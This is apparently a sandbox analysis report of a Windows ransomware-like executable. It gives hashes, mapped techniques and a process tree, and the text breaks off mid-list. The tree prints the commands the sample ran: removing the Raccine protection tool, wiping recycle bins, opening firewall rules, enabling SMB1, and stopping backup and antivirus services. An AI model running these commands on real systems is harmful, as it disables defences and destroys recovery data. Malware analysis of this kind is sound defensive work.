1b8621d6e97ce87a8a5664699d285f417a5a08c40fb658aac9178dc5a6d4826c

Analysis

max time kernel
8s
max time network
45s
platform
windows7_x64
resource
win7v20210408
submitted
28-05-2021 09:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
Size

121KB
MD5

4096e6730b117ae60dc3e5d4fd31acda
SHA1

03baaf95e69aa6da711eae0e75f4908e02087587
SHA256

2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d
SHA512

c8f7ed4b469fa0f98643f561e6e505dfb5ab78656910c9b3d9ee21b167e500460a29eb1a42270817490f458a8189a385d6bd7f9e3935bd48f6755d430a845e00

Score

8^/10

discovery evasion

Malware Config

Signatures

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Drops startup file 1 IoCs

Processes:

2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe

Modifies file permissions 1 TTPs 3 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exe

pid process

2160 icacls.exe
3724 icacls.exe
3756 icacls.exe
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Discovers systems in the same network 1 TTPs 1 IoCs
discovery

Remote System Discovery
T1018

Processes:

net.exe

pid process

2248 net.exe

pid	process
2160	icacls.exe
3724	icacls.exe
3756	icacls.exe

pid	process
2248	net.exe

Kills process with taskkill 48 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
2660	taskkill.exe
2908	taskkill.exe
2780	taskkill.exe
2668	taskkill.exe
2152	taskkill.exe
2868	taskkill.exe
2692	taskkill.exe
2916	taskkill.exe
4060	taskkill.exe
1060	taskkill.exe
1352	taskkill.exe
1636	taskkill.exe
2796	taskkill.exe
2996	taskkill.exe
4076	taskkill.exe
4068	taskkill.exe
2920	taskkill.exe
1728	taskkill.exe
588	taskkill.exe
2884	taskkill.exe
2892	taskkill.exe
2932	taskkill.exe
4084	taskkill.exe
1520	taskkill.exe
1684	taskkill.exe
2332	taskkill.exe
2820	taskkill.exe
1668	taskkill.exe
2600	taskkill.exe
4092	taskkill.exe
1632	taskkill.exe
2856	taskkill.exe
1512	taskkill.exe
1840	taskkill.exe
628	taskkill.exe
2748	taskkill.exe
2756	taskkill.exe
2876	taskkill.exe
2348	taskkill.exe
2804	taskkill.exe
784	taskkill.exe
2956	taskkill.exe
932	taskkill.exe
1356	taskkill.exe
2860	taskkill.exe
2620	taskkill.exe
112	taskkill.exe
1020	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1012 reg.exe
Runs net.exe

pid	process
1012	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe

pid	process
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
Token: SeDebugPrivilege	1520	taskkill.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe

pid process

1908 2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
Suspicious use of SendNotifyMessage 1 IoCs

Processes:

2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe

pid process

1908 2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe

description	pid	process	target process
PID 1908 wrote to memory of 1520	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	taskkill.exe
PID 1908 wrote to memory of 1520	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	taskkill.exe
PID 1908 wrote to memory of 1520	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	taskkill.exe
PID 1908 wrote to memory of 576	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	reg.exe
PID 1908 wrote to memory of 576	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	reg.exe
PID 1908 wrote to memory of 576	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	reg.exe
PID 1908 wrote to memory of 1012	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	reg.exe
PID 1908 wrote to memory of 1012	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	reg.exe
PID 1908 wrote to memory of 1012	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	reg.exe
PID 1908 wrote to memory of 1708	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	schtasks.exe
PID 1908 wrote to memory of 1708	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	schtasks.exe
PID 1908 wrote to memory of 1708	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	schtasks.exe
PID 1908 wrote to memory of 1716	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	cmd.exe
PID 1908 wrote to memory of 1716	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	cmd.exe
PID 1908 wrote to memory of 1716	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	cmd.exe
PID 1908 wrote to memory of 1168	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	cmd.exe
PID 1908 wrote to memory of 1168	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	cmd.exe
PID 1908 wrote to memory of 1168	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	cmd.exe
PID 1908 wrote to memory of 1068	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	netsh.exe
PID 1908 wrote to memory of 1068	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	netsh.exe
PID 1908 wrote to memory of 1068	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	netsh.exe
PID 1908 wrote to memory of 364	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	sc.exe
PID 1908 wrote to memory of 364	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	sc.exe
PID 1908 wrote to memory of 364	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	sc.exe
PID 1908 wrote to memory of 1016	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	netsh.exe
PID 1908 wrote to memory of 1016	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	netsh.exe
PID 1908 wrote to memory of 1016	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	netsh.exe
PID 1908 wrote to memory of 2032	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	sc.exe
PID 1908 wrote to memory of 2032	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	sc.exe
PID 1908 wrote to memory of 2032	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	sc.exe
PID 1908 wrote to memory of 632	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	sc.exe
PID 1908 wrote to memory of 632	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	sc.exe
PID 1908 wrote to memory of 632	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	sc.exe
PID 1908 wrote to memory of 1052	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	sc.exe
PID 1908 wrote to memory of 1052	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	sc.exe
PID 1908 wrote to memory of 1052	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	sc.exe
PID 1908 wrote to memory of 1060	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	sc.exe
PID 1908 wrote to memory of 1060	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	sc.exe
PID 1908 wrote to memory of 1060	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	sc.exe
PID 1908 wrote to memory of 872	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	sc.exe
PID 1908 wrote to memory of 872	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	sc.exe
PID 1908 wrote to memory of 872	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	sc.exe
PID 1908 wrote to memory of 1836	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	sc.exe
PID 1908 wrote to memory of 1836	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	sc.exe
PID 1908 wrote to memory of 1836	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	sc.exe
PID 1908 wrote to memory of 936	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	sc.exe
PID 1908 wrote to memory of 936	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	sc.exe
PID 1908 wrote to memory of 936	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	sc.exe
PID 1908 wrote to memory of 1840	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	net.exe
PID 1908 wrote to memory of 1840	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	net.exe
PID 1908 wrote to memory of 1840	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	net.exe
PID 1908 wrote to memory of 1772	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	net.exe
PID 1908 wrote to memory of 1772	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	net.exe
PID 1908 wrote to memory of 1772	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	net.exe
PID 1908 wrote to memory of 980	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	net.exe
PID 1908 wrote to memory of 980	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	net.exe
PID 1908 wrote to memory of 980	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	net.exe
PID 1908 wrote to memory of 1804	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	net.exe
PID 1908 wrote to memory of 1804	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	net.exe
PID 1908 wrote to memory of 1804	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	net.exe
PID 1908 wrote to memory of 1508	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	net.exe
PID 1908 wrote to memory of 1508	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	net.exe
PID 1908 wrote to memory of 1508	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	net.exe
PID 1908 wrote to memory of 644	1908	2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe	net.exe

C:\Users\Admin\AppData\Local\Temp\2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\2d3d1b83067859ebb118ff1a99ac098806b65f566df094fad9a4debef4da911d.bin.sample.exe"
1⤵
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1908
- C:\Windows\system32\taskkill.exe
  "taskkill" /F /IM RaccineSettings.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1520
- C:\Windows\system32\reg.exe
  "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
  2⤵
  PID:576
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Acronis VSS Provider” /y
    3⤵
    PID:4960
- C:\Windows\system32\reg.exe
  "reg" delete HKCU\Software\Raccine /F
  2⤵
  - Modifies registry key
  PID:1012
- C:\Windows\system32\schtasks.exe
  "schtasks" /DELETE /TN "Raccine Rules Updater" /F
  2⤵
  PID:1708
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecRPCService /y
    3⤵
    PID:4908
- C:\Windows\system32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
  2⤵
  PID:1716
- C:\Windows\system32\cmd.exe
  "cmd.exe" /c rd /s /q D:\\$Recycle.bin
  2⤵
  PID:1168
- C:\Windows\system32\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:1068
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MBAMService /y
    3⤵
    PID:2348
- C:\Windows\system32\sc.exe
  "sc.exe" config Dnscache start= auto
  2⤵
  PID:364
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeFramework /y
    3⤵
    PID:2096
- C:\Windows\system32\netsh.exe
  "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
  2⤵
  PID:1016
- C:\Windows\system32\sc.exe
  "sc.exe" config FDResPub start= auto
  2⤵
  PID:2032
- C:\Windows\system32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  PID:1052
- C:\Windows\system32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  PID:1060
- C:\Windows\system32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  PID:632
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecJobEngine /y
    3⤵
    PID:4992
- C:\Windows\system32\sc.exe
  "sc.exe" config SSDPSRV start= auto
  2⤵
  PID:1836
- C:\Windows\system32\sc.exe
  "sc.exe" config upnphost start= auto
  2⤵
  PID:936
- C:\Windows\system32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:872
- C:\Windows\system32\net.exe
  "net.exe" start Dnscache /y
  2⤵
  PID:1840
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 start Dnscache /y
    3⤵
    PID:628
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
    3⤵
    PID:1664
- C:\Windows\system32\net.exe
  "net.exe" start FDResPub /y
  2⤵
  PID:1804
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 start FDResPub /y
    3⤵
    PID:1020
- C:\Windows\system32\net.exe
  "net.exe" stop avpsus /y
  2⤵
  PID:1508
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop avpsus /y
    3⤵
    PID:1268
- C:\Windows\system32\net.exe
  "net.exe" stop McAfeeDLPAgentService /y
  2⤵
  PID:644
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
    3⤵
    PID:768
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcronisAgent /y
    3⤵
    PID:5000
- C:\Windows\system32\net.exe
  "net.exe" start upnphost /y
  2⤵
  PID:240
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 start upnphost /y
    3⤵
    PID:1588
- C:\Windows\system32\net.exe
  "net.exe" stop NetBackup BMR MTFTP Service /y
  2⤵
  PID:1684
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:2112
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MBEndpointAgent /y
      4⤵
      PID:1076
- C:\Windows\system32\cmd.exe
  "cmd.exe" /c net view
  2⤵
  PID:2056
- - C:\Windows\system32\net.exe
    net view
    3⤵
    - Discovers systems in the same network
    PID:2248
- C:\Windows\system32\net.exe
  "net.exe" stop SavRoam /y
  2⤵
  PID:2184
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SavRoam /y
    3⤵
    PID:2384
- C:\Windows\system32\net.exe
  "net.exe" stop RTVscan /y
  2⤵
  PID:2224
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop RTVscan /y
    3⤵
    PID:2372
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “SQLsafe Filter Service” /y
      4⤵
      PID:1076
- C:\Windows\system32\net.exe
  "net.exe" stop QBIDPService /y
  2⤵
  PID:2460
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBIDPService /y
    3⤵
    PID:2564
- C:\Windows\system32\net.exe
  "net.exe" stop MMS /y
  2⤵
  PID:2500
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MMS /y
    3⤵
    PID:2592
- C:\Windows\system32\net.exe
  "net.exe" stop EhttpSrv /y
  2⤵
  PID:2400
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:2360
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop YooBackup /y
    3⤵
    PID:2224
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:2312
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:2276
- C:\Windows\system32\net.exe
  "net.exe" stop VSNAPVSS /y
  2⤵
  PID:2236
- C:\Windows\system32\net.exe
  "net.exe" stop ccSetMgr /y
  2⤵
  PID:2148
- C:\Windows\system32\net.exe
  "net.exe" stop ccEvtMgr /y
  2⤵
  PID:2124
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$SQL_2008 /y
  2⤵
  PID:1800
- C:\Windows\system32\net.exe
  "net.exe" stop QBFCService /y
  2⤵
  PID:668
- C:\Windows\system32\net.exe
  "net.exe" stop DefWatch /y
  2⤵
  PID:1352
- C:\Windows\system32\net.exe
  "net.exe" stop BMR Boot Service /y
  2⤵
  PID:1140
- C:\Windows\system32\net.exe
  "net.exe" stop mfewc /y
  2⤵
  PID:920
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
  2⤵
  PID:1340
- C:\Windows\system32\net.exe
  "net.exe" stop bedbg /y
  2⤵
  PID:980
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
    3⤵
    PID:2688
- C:\Windows\system32\net.exe
  "net.exe" start SSDPSRV /y
  2⤵
  PID:1772
- C:\Windows\system32\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:2660
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop PDVFSService /y
    3⤵
    PID:2204
- C:\Windows\system32\net.exe
  "net.exe" stop masvc /y
  2⤵
  PID:2932
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop masvc /y
    3⤵
    PID:1692
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLFDLauncher$TPS /y
  2⤵
  PID:2916
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
    3⤵
    PID:2544
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamCloudSvc /y
  2⤵
  PID:2908
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamCloudSvc /y
    3⤵
    PID:2228
- C:\Windows\system32\net.exe
  "net.exe" stop macmnsvc /y
  2⤵
  PID:2892
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop macmnsvc /y
    3⤵
    PID:2528
- C:\Windows\system32\net.exe
